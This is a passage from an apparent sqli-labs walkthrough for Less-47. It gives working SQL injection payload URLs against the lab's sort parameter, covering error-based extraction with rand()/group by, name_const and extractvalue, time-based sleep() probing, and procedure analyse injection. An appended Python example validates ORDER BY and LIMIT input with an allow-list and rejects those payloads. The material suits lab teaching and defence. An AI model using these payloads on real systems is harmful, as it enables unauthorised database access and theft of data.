, the parameter after order by. Here we can only use "and" to perform error-based and delay injection. A few payload examples follow.
① Combining "and" with rand(). Payload:
http://127.0.0.1/sqli-labs/Less-47/index.php?sort=1%27and%20rand(ascii(left(database(),1))=115)--+
After switching to 116:
http://127.0.0.1/sqli-labs/Less-47/index.php?sort=1%27and%20rand(ascii(left(database(),1))=116)--+
Later testing showed that this approach still has problems, and it cannot be used for precise injection. It is left here only as an example.
② Error-based injection can be used
http://127.0.0.1/sqli-labs/Less-47/?sort=1%27and%20(select%20count(*)%20from%20information_schema.columns%20group%20by%20concat(0x3a,0x3a,(select%20user()),0x3a,0x3a,floor(rand()*2)))--+
The error message shows the contents of user(), and other statements can be constructed in the same way.
Here is another error-based injection. Its principle is the same as that of the payload above: both rely on duplicate values in MySQL.
http://127.0.0.1/sqli-labs/Less-47/?sort=1%27and%20(select%20*%20from%20(select%20name_const(version(),1),name_const(version(),1))x)--+
version() is repeated here, so an error is raised.
③ Delay injection
http://127.0.0.1/sqli-labs/Less-47/?sort=1%27and%20if(ascii(substr(database(),1,1))=115,0,sleep(5))--+
Because database() is security, the ASCII code of its first letter, s, is 115, so here the response returns directly. When the value is changed to 116 or another number, the response is delayed. We do not show screenshots here; this can be brute-forced with a script.
(2) Injection after the procedure analyse parameter
Using the procedure analyse parameter, we can perform an error-based injection. There can also be a limit parameter between order by and procedure analyse, so in practice we may encounter a limit injection as well, which can likewise be exploited with procedure analyse.
The following is an example:
http://127.0.0.1/sqli-labs/Less-47/?sort=1%27procedure%20analyse(extractvalue(rand(),concat(0x3a,version())),1)--+
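The requests above depend on the sort value being placed into the ORDER BY clause as SQL text. The following added example (not part of the original page or of sqli-labs, and written in Python rather than the lab's PHP) shows the defensive counterpart: the ORDER BY and LIMIT fragments are built from an allow-list and an integer check, so the payload shapes from both sections are rejected. The column names, the limit query parameter, MAX_LIMIT and the function names are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

COLUMNS = ("id", "username", "password")  # assumption: sortable columns
MAX_LIMIT = 100                           # assumption: largest page size


def order_clause(sort, limit=None):
    """Build 'ORDER BY ... [LIMIT n]' from untrusted input or raise ValueError.

    Identifiers cannot be bound as statement parameters, so the column is
    picked from COLUMNS and the request value is never copied into SQL.
    """
    key = sort.strip().lower()
    if re.fullmatch(r"[1-9]", key) and int(key) <= len(COLUMNS):
        column = COLUMNS[int(key) - 1]      # positional form, e.g. sort=1
    elif key in COLUMNS:
        column = key
    else:
        raise ValueError("sort value is not an allowed column")
    clause = "ORDER BY `%s`" % column
    if limit is not None:
        if not re.fullmatch(r"[0-9]{1,3}", limit) or int(limit) > MAX_LIMIT:
            raise ValueError("limit must be an integer up to %d" % MAX_LIMIT)
        clause += " LIMIT %d" % int(limit)
    return clause


def audit(urls):
    """Return (url, clause-or-None) pairs; None marks a rejected request."""
    results = []
    for url in urls:
        params = parse_qs(urlsplit(url).query)  # also URL-decodes %27, %20, +
        try:
            clause = order_clause(params.get("sort", [""])[0],
                                  params.get("limit", [None])[0])
        except ValueError:
            clause = None
        results.append((url, clause))
    return results


# Constructed sample requests: one benign, two shaped like the payloads above.
BASE = "http://127.0.0.1/sqli-labs/Less-47/?sort="
SAMPLES = [
    BASE + "2&limit=10",  # "limit" is a hypothetical parameter
    BASE + "1%27and%20if(ascii(substr(database(),1,1))=115,0,sleep(5))--+",
    BASE + "1%27procedure%20analyse(extractvalue(rand(),concat(0x3a,version())),1)--+",
]

if __name__ == "__main__":
    for url, clause in audit(SAMPLES):
        print("ACCEPT" if clause else "REJECT", clause or url)
```

Because rejection happens before any SQL is assembled, the same check can be run over logged request URLs to flag sort values that are not plain column references.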